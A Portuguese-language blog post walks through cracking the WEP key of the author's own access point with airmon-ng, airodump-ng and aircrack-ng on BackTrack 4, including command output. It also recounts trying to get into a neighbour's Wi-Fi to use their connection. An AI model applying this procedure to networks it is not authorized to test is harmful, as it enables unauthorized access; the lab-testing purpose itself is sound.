quinta-feira, 28 de março de 2013

chave wep X back-track4

Na minha tentativa mais promissora de descobrir a senha de um AP meu,passei 30 min capturando pacotes IVs e não deu certo, tive de adicionar a senha em um arquivo "wordlist" para tentar de novo com os mesmos pacotes IVs e assim usando um "brute force" descobri a senha -master- então pra mim foi uma pseudo quebra de senha poi eu já a tinha na lista de possiveis, dada minha frustação deixei isto de lado; mas não perdi meu interesse em "pentest" pois vi uma reportagem televisiva onde o exercito brasileiro usa a distribuição Linux BackTrack para fazer auditoria em redes wifi.

Além de BT4 e BT5 beixei 3 versões do Beini, dada minha inabilidade em 'pentest', mesmo assim o maximo que consegui foi conectar-me em um AP da minha vizinha, porem o Beini dava conectado, sem senha ou navegação, nem acesso ao AP ou PC, é como ter passado pelo portao e não entrar na casa; e o objetivo eva navegar na internet usando a conexão alheia. Tá certo que era chave wpa2 mais em varias tentativas a APs diversos nem a conexão forçada eu consegui. -------------------------------- porem não escrevo este post para lamentações e sim para contar de um sucesso, não a nada em pt-br na internet que ajude um iniciante a 'se dar bem' em 'pentestes' penso que há um complô ou pacto para vc ter de pagar por aulas em cursos, comprar DVDs de video aulas se quiser engatinhar nesta area.
Porem notadamente tem alguns tutoriais em espanhol que ajudam, as video aulas no youtube tem cortes e não são passo a paso, como precisa um iniciante, elas não são claras e deixam brechas onde o novato emperra, assim como nas dicas escritas, porém, como dizia peguei um tuto na web em espanhol e dele consegui descobrir a senha que coloquei no meu AP, foi uma senha exdruxulamente fraca: abcde porem nescessaria para meu aprendizado, já que sou autodidata.
vou detalhar aqui, meu 'sucesso' e fazer mais testes postando mais detalhes e sendo mais conciso na escrita, ou seja falando menos e fazendo mais.
============================
meu teste: hardware utilizado: software utilizado: metodo utilizado:
modem ZTE conectado à Velox e num switch GTS 8-portas
deste switch saem 3 cabos: 2 desktops com Big Linux 5 e com BackTrack 4 e o AP TPlink
a internet roda nos 2 micros, o AP Tplink(com nome de vitima) tem um Laptop HP conectado na wireless com wep de 5 letras(abcde)
nota: o windows 7 do Laptop nao aceita wep no modo compertilhado, tem que ser em modo aberto, comédia é que depois de configurado o AP (com wep-compartilhada) o windows7 não conecta para reconfigurar, teria de resetar o AP voltando à configuração de fabrica, se não fosse a conecxão cabeada com o PC-BT4 (não testei no PC-BL5)
corrigida a exigencia do win7, conectei o Laptop via wireless no AP e coloquei a navegar na web
desconectei o cabo-net do PC-BT4, voltei para modo texto(Crtl+Alt+Backspace) e pluguei nele uma placa de radio usb da Ralink, estando na mesma sala nem precisei colocar antena
depois eu posto mais explicações com fotos
em modo texto e estando o prompt # na sua tela, coloque o wifi-usb no PC
aparece uma mensagem informando a detecção e ativação do dispositivo
o linux já sobe o modulo do wifi-usb veja em # lsmod
-------------------------
digite: airmon-ng que aparece a wlan0 com o nome Ralink
-------------------------
-agora digite airmon-ng
e veja interface= wlan0, chipset= Ralink 2573 USB e driver= rt2573usb - [phy1]

-agora digite airodump-ng wlan0
CH canal ][ elapsed: 3 mins ][ 2013-03-27 14:51 (observe que 'canal" não para de mudar indicando
que está escaneando todos os canais e a procurar qualquer AP)

-abaixo veja
BSSID PWR Beacons #Data, #/s CH MB ENc CIPHER AUTH ESSID
64:70:02:53:4E:2E -51 438 59 0 6 54e WEP WEP vitima

BSSID STATION PWR Rate Lost Packets Probes
64:70:02:53:4E:2E 00:26:C7:1F:20:2A -57 0 -1e 0 70 vitima
------------------------------------

agora digita Crtl-C para parar o scaneamento.
e digite denovo airodump-ng com algumas mudanças.
airodump-ng -c(canal da vitima)-w crackwep(nomearq com as captuas)
--bssid (MAC da vitima) wlan0(tua interface) assim só aparecerá o AP vitima

airodump-ng -c 6 -w crack-ap --bssid 64:70:02:53:4E:2E

veja que o contador de tempo zera e começas em segundos, e o campo CH não varia mais.

observe com atençao o campo #DATA... este valor tera de chegar a 15.000 ou mais para comecar a descriptografar a chave wep
------------------------
0 meu ja está com #data = 82.284 e packets = 85547

tecle Alt+F2 para ir a um outro terminal(continua como root #)
digite "ls" para ver os arquivos guardados na pasta root, seguindo meu exemplo temos
# ls
crack-ap-01.cap crack-ap-01.cvs crack-ap-01.kismet.cvs crack-ap-01.kismet.netxml install.sh

mas iremos usar o crack-ap-01.cap

# aircrack-ng crack-ap-01.cap
Opening crack-ap-01.cap
Read 152130 packets.
# BSSID ESSID Encryption
1 64:70:02:53:4E:2e vitima WEP (75972 IVs)

Choosing first network as target.
Opening crack-ap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 76035 ivs.
KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde)
Decrypted correctly: 100%

Sem comentários:

Enviar um comentário